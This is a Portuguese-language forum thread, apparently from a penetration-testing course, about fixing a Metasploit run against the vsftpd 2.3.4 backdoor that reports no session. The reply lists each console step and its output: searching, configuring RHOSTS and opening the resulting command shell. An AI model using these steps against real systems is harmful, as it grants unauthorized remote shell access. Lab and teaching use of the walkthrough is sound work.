fiz os passos da video aula, o metasploit inicia toda configuração mas não abre a porta, como resolver isso ???
Exploit completed, but no session was created.
fiz os passos da video aula, o metasploit inicia toda configuração mas não abre a porta, como resolver isso ???
Exploit completed, but no session was created.
Boa tarde galera, para quem estiver passando por isso eu achei a solução. Algumas vezes a sessão abre automaticamente, outras não irá abrir mas vai deixar um aviso de qual sessão foi aberta para você usar.
o comando abaixo vai procurar pelo exploit desejado
search vsftp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
o comando abaixo vai trazer informações sobre o exploit
info exploit/unix/ftp/vsftpd_234_backdoor
Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-07-03
Provided by:
hdm <x@hdm.io>
MC <mc@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload information:
Space: 2000
Avoid: 0 characters
Description:
This module exploits a malicious backdoor that was added to the
VSFTPD download archive. This backdoor was introduced into the
vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
according to the most recent information available. This backdoor
was removed on July 3rd 2011.
References:
OSVDB (73573)
http://pastebin.com/AetT9sS5
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
o comando abaixo vai fazer utilizarmos o exploit
use exploit/unix/ftp/vsftpd_234_backdoor
o comando abaixo mostra as opções que deveremos configurar no caso RHOSTS
show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
o comando abaixo configuramos o RHOSTS
set RHOSTS "oipdoalvo"
caso o sua sessão não inicie com o terminal automaticamente lhe informando isso através da mensagem abaixo
Exploit completed, but no session was created.
Fique atento pois logo abaixo ele especifica que sessão você deve abrir
Command shell session 1 opened
Para abrir a sessão usamos o seguinte comando
sessions 1
ps: no meu caso a número 1 estava disponível como aviso no terminal.